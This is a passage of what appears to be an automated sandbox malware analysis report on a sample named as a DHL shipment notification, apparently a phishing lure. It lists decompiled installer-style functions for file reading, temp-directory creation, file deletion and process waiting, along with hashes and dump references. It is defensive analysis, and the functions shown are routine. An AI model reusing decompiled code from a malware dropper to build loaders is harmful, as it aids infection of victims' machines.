                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CountFileNameTempTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                        • API String ID: 1716503409-678247507
                        • Opcode ID: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                        • Instruction ID: 4618a7cd5e379287717806b061479f75a97df545f28ae60e57938b9bb9b89627
                        • Opcode Fuzzy Hash: 6315ab6e6f8253ba2c88c9b6803a176270f8621abb800126aa0f3c3b7b9ef66c
                        • Instruction Fuzzy Hash: 4CF09676700214BFDB008F55ED05E9AB7BCEF91710F11803AEE05E7150E6B099548764
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403C2B Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 575 403c2b-403c3a 576 403c46-403c4e 575->576 577 403c3c-403c3f CloseHandle 575->577 578 403c50-403c53 CloseHandle 576->578 579 403c5a-403c66 call 403c88 call 405d7a 576->579 577->576 578->579 583 403c6b-403c6c 579->583
                        C-Code - Quality: 100%
                        			E00403C2B() {
				void* _t1;
				void* _t2;
				void* _t4;
				signed int _t11;

				_t1 =  *0x40a018; // 0xffffffff
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0xffffffff
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C88();
				_t4 = E00405D7A(_t11, L"C:\\Users\\jones\\AppData\\Local\\Temp\\nsz26CF.tmp\\", 7); // executed
				return _t4;
			}







                        0x00403c2b
                        0x00403c3a
                        0x00403c3d
                        0x00403c3f
                        0x00403c3f
                        0x00403c46
                        0x00403c4e
                        0x00403c51
                        0x00403c53
                        0x00403c53
                        0x00403c53
                        0x00403c5a
                        0x00403c66
                        0x00403c6c

                        APIs
                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C3D
                        • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403B77,?), ref: 00403C51
                        Strings
                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C30
                        • C:\Users\user\AppData\Local\Temp\nsz26CF.tmp\, xrefs: 00403C61
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CloseHandle
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsz26CF.tmp\
                        • API String ID: 2962429428-3348034935
                        • Opcode ID: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                        • Instruction ID: 4491f7c80fa00ae2087dec4a459748e9e372b7f9a3145cafecdefc003a92e639
                        • Opcode Fuzzy Hash: 52edf64d19f6e486756a6566919607a0afda347394bdeaae2c0f5391c2589c01
                        • Instruction Fuzzy Hash: F3E0863244471896D1347F7DAE4D9853B195F413327204326F178F20F0C7389AA74A99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403377 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 584 403377-403384 585 4033a2-4033ab call 40347f 584->585 586 403386-40339c SetFilePointer 584->586 589 4033b1-4033c4 call 4061e1 585->589 590 403479-40347c 585->590 586->585 593 403469 589->593 594 4033ca-4033dd call 40347f 589->594 596 40346b-40346c 593->596 598 4033e3-4033e6 594->598 599 403477 594->599 596->590 600 403445-40344b 598->600 601 4033e8-4033eb 598->601 599->590 602 403450-403467 ReadFile 600->602 603 40344d 600->603 601->599 604 4033f1 601->604 602->593 605 40346e-403471 602->605 603->602 606 4033f6-403400 604->606 605->599 607 403402 606->607 608 403407-403419 call 4061e1 606->608 607->608 608->593 611 40341b-403422 call 406210 608->611 613 403427-403429 611->613 614 403441-403443 613->614 615 40342b-40343d 613->615 614->596 615->606 616 40343f 615->616 616->599
                        C-Code - Quality: 92%
                        			E00403377(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x7a8af8;
					 *0x79f734 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E0040347F(4);
				if(_t22 >= 0) {
					_t24 = E004061E1( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x79f734 =  *0x79f734 + 4;
						_t36 = E0040347F(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x79f734 =  *0x79f734 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										if(E004061E1( *0x40a01c, 0x793730, _t28) == 0) {
											goto L18;
										}
										_t30 = E00406210(_a8, 0x793730, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x79f734 =  *0x79f734 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}














                        0x0040337b
                        0x00403384
                        0x0040338d
                        0x00403391
                        0x0040339c
                        0x0040339c
                        0x004033a4
                        0x004033ab
                        0x004033bd
                        0x004033c4
                        0x00403469
                        0x00403469
                        0x00000000
                        0x004033ca
                        0x004033cd
                        0x004033d9
                        0x004033dd
                        0x00403477
                        0x00403477
                        0x004033e3
                        0x004033e6
                        0x00403445
                        0x0040344b
                        0x0040344d
                        0x0040344d
                        0x0040345f
                        0x00403467
                        0x0040346e
                        0x00403471
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004033e8
                        0x004033eb
                        0x00000000
                        0x004033f1
                        0x004033f6
                        0x004033fd
                        0x00403400
                        0x00403402
                        0x00403402
                        0x0040340f
                        0x00403419
                        0x00000000
                        0x00000000
                        0x00403422
                        0x00403429
                        0x00403441
                        0x0040346b
                        0x0040346b
                        0x0040342b
                        0x0040342b
                        0x0040342e
                        0x00403431
                        0x00403437
                        0x0040343d
                        0x00000000
                        0x0040343f
                        0x00000000
                        0x0040343f
                        0x0040343d
                        0x00000000
                        0x00403429
                        0x00000000
                        0x004033f6
                        0x004033eb
                        0x004033e6
                        0x004033dd
                        0x004033c4
                        0x00403479
                        0x0040347c

                        APIs
                        • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,00403323,000000FF,00000000,00000000,?,?), ref: 0040339C
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: FilePointer
                        • String ID: 07y
                        • API String ID: 973152223-1660179758
                        • Opcode ID: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                        • Instruction ID: 558639dd8831905cecc0235a21772d735375f1fafe9af626847c4dd8eee9aa20
                        • Opcode Fuzzy Hash: 6b22196eac9600fa0887d596689305aa324d5ca70b4b9ec5c244ac4710233144
                        • Instruction Fuzzy Hash: 73319330201218FFDF129FA5ED85D9E3F68EB00359F10803AF905E9190D778DA51DBA9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 617 4015c1-4015d5 call 402da6 call 405fe8 622 401631-401634 617->622 623 4015d7-4015ea call 405f6a 617->623 625 401663-4022f6 call 401423 622->625 626 401636-401655 call 401423 call 40666e SetCurrentDirectoryW 622->626 631 401604-401607 call 405c1c 623->631 632 4015ec-4015ef 623->632 641 402c2a-402c39 625->641 642 40292e-402935 625->642 626->641 644 40165b-40165e 626->644 640 40160c-40160e 631->640 632->631 637 4015f1-4015f8 call 405c39 632->637 637->631 648 4015fa-4015fd call 405b9f 637->648 645 401610-401615 640->645 646 401627-40162f 640->646 642->641 644->641 649 401624 645->649 650 401617-401622 GetFileAttributesW 645->650 646->622 646->623 653 401602 648->653 649->646 650->646 650->649 653->640
                        C-Code - Quality: 86%
                        			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402DA6(0xfffffff0);
				_t17 = E00405FE8(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405F6A(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405C1C( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405C39(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E00405B9F( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E0040666E(L"C:\\Users\\jones\\AppData\\Local\\Temp",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}











                        0x004015c1
                        0x004015c9
                        0x004015cc
                        0x004015d1
                        0x004015d5
                        0x004015d7
                        0x004015df
                        0x004015e1
                        0x004015e4
                        0x004015ea
                        0x00401604
                        0x00401607
                        0x004015ec
                        0x004015ec
                        0x004015ef
                        0x00000000
                        0x004015fa
                        0x004015fd
                        0x004015fd
                        0x004015ef
                        0x0040160e
                        0x00401615
                        0x00401624
                        0x00401624
                        0x00401617
                        0x0040161a
                        0x00401622
                        0x00000000
                        0x00000000
                        0x00401622
                        0x00401615
                        0x00401627
                        0x0040162b
                        0x0040162c
                        0x004015d7
                        0x00401634
                        0x00401663
                        0x004022f1
                        0x00401636
                        0x00401638
                        0x00401645
                        0x0040164d
                        0x00401655
                        0x0040165b
                        0x0040165b
                        0x00401655
                        0x00402c2d
                        0x00402c39

                        APIs
                          • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                          • Part of subcall function 00405B9F: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405BE2
                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 0040164D
                        Strings
                        • C:\Users\user\AppData\Local\Temp, xrefs: 00401640
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                        • String ID: C:\Users\user\AppData\Local\Temp
                        • API String ID: 1892508949-47812868
                        • Opcode ID: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                        • Instruction ID: 957f66bc23545469dbc724fd3d157a479205f5e7ec4e330cdfccc87aa14dd729
                        • Opcode Fuzzy Hash: f9cb4e2508e2448aa58c0f22a173479fd38d1f56d80015943564eb9aeda41760
                        • Instruction Fuzzy Hash: 3111E231408115EBCF217FA5CD4099E36A0EF15369B28493BFA01B22F1DA3E49829B5E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405D32 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 654 405d32-405d43 call 406139 657 405d73 654->657 658 405d45-405d4b 654->658 661 405d75-405d77 657->661 659 405d55 DeleteFileW 658->659 660 405d4d-405d53 RemoveDirectoryW 658->660 662 405d5b-405d5d 659->662 660->662 663 405d64-405d69 662->663 664 405d5f-405d62 662->664 663->657 665 405d6b-405d6d SetFileAttributesW 663->665 664->661 665->657
                        C-Code - Quality: 41%
                        			E00405D32(void* __eflags, WCHAR* _a4, signed int _a8) {
				int _t9;
				long _t13;
				WCHAR* _t14;

				_t14 = _a4;
				_t13 = E00406139(_t14);
				if(_t13 == 0xffffffff) {
					L8:
					return 0;
				}
				_push(_t14);
				if((_a8 & 0x00000001) == 0) {
					_t9 = DeleteFileW();
				} else {
					_t9 = RemoveDirectoryW(); // executed
				}
				if(_t9 == 0) {
					if((_a8 & 0x00000004) == 0) {
						SetFileAttributesW(_t14, _t13);
					}
					goto L8;
				} else {
					return 1;
				}
			}






                        0x00405d33
                        0x00405d3e
                        0x00405d43
                        0x00405d73
                        0x00000000
                        0x00405d73
                        0x00405d4a
                        0x00405d4b
                        0x00405d55
                        0x00405d4d
                        0x00405d4d
                        0x00405d4d
                        0x00405d5d
                        0x00405d69
                        0x00405d6d
                        0x00405d6d
                        0x00000000
                        0x00405d5f
                        0x00000000
                        0x00405d61

                        APIs
                          • Part of subcall function 00406139: GetFileAttributesW.KERNELBASE(?,?,00405D3E,?,?,00000000,00405F14,?,?,?,?), ref: 0040613E
                          • Part of subcall function 00406139: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00406152
                        • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F14), ref: 00405D4D
                        • DeleteFileW.KERNEL32(?,?,?,00000000,00405F14), ref: 00405D55
                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D6D
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$Attributes$DeleteDirectoryRemove
                        • String ID:
                        • API String ID: 1655745494-0
                        • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                        • Instruction ID: 65d886778d981234f1bc095319bf1530848ff53bfe772b7143d7b60a17f83489
                        • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                        • Instruction Fuzzy Hash: E1E0E531204EA056C7106B35AD0CF5B2A98EF86314F05893FF592B10D0D77888078AAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406AE6 Relevance: 4.5, APIs: 3, Instructions: 27synchronizationCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 666 406ae6-406afe WaitForSingleObject 667 406b0e-406b10 666->667 668 406b00-406b0c call 406a77 WaitForSingleObject 667->668 669 406b12-406b25 GetExitCodeProcess 667->669 668->667
                        C-Code - Quality: 100%
                        			E00406AE6(void* __ecx, void* _a4) {
				long _v8;
				long _t6;

				_t6 = WaitForSingleObject(_a4, 0x64);
				while(_t6 == 0x102) {
					E00406A77(0xf);
					_t6 = WaitForSingleObject(_a4, 0x64);
				}
				GetExitCodeProcess(_a4,  &_v8); // executed
				return _v8;
			}





                        0x00406af7
                        0x00406b0e
                        0x00406b02
                        0x00406b0c
                        0x00406b0c
                        0x00406b19
                        0x00406b25

                        APIs
                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401F9F,?,?,?,?,?,?), ref: 00406AF7
                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F,?,?,00401F9F,?,?,?,?,?,?), ref: 00406B0C
                        • GetExitCodeProcess.KERNELBASE(?,?), ref: 00406B19
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: ObjectSingleWait$CodeExitProcess
                        • String ID:
                        • API String ID: 2567322000-0
                        • Opcode ID: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                        • Instruction ID: 2c972b7a35bd62db52b15041da2731f4b89024a3c017fe3bef96d42d01d66162
                        • Opcode Fuzzy Hash: 283581236024a182d03fca7383c40b0f2a2dbb9aa7d2600e4fb29ca982165da2
                        • Instruction Fuzzy Hash: 67E09271600218BBEB00AB54DD05E9E7F7EDB44700F110032F601F6190C6B1EE22DAA4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406045 Relevance: 3.0, APIs: 2, Instructions: 47stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 53%
                        			E00406045(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040666E(0x7a4790, _a4);
				_t21 = E00405FE8(0x7a4790);
				if(_t21 != 0) {
					E004068F5(_t21);
					if(( *0x7a8ab8 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x7a4790 >> 1;
						while(1) {
							_t11 = lstrlenW(0x7a4790);
							_push(0x7a4790);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E004069A4();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F89(0x7a4790);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F3D();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                        0x00406051
                        0x0040605c
                        0x00406060
                        0x00406067
                        0x00406073
                        0x00406083
                        0x00406085
                        0x0040609d
                        0x0040609e
                        0x004060a5
                        0x004060a6
                        0x00000000
                        0x00000000
                        0x00406089
                        0x00406090
                        0x00406098
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406090
                        0x004060a8
                        0x004060ae
                        0x00000000
                        0x004060bc
                        0x00406075
                        0x0040607b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040607b
                        0x00406062
                        0x00000000

                        APIs
                          • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                          • Part of subcall function 00405FE8: CharNextW.USER32(?,?,007A4790,?,0040605C,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 00405FF6
                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00405FFB
                          • Part of subcall function 00405FE8: CharNextW.USER32(00000000), ref: 00406013
                        • lstrlenW.KERNEL32(007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560,00000000), ref: 0040609E
                        • GetFileAttributesW.KERNELBASE(007A4790,007A4790,007A4790,007A4790,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004060AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
